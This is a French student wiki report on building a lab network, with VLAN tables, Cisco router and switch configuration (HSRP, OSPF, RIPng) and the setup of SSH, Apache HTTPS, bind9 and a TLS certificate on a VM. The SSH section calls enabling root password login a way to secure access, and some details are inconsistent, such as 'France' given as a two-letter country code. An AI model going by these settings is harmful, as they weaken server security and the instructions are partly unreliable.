* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Management=====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain Interface (BDI)&lt;br /&gt;
&lt;br /&gt;
HSRP: Hot standby router protocol [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus]&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation du réseau ===&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
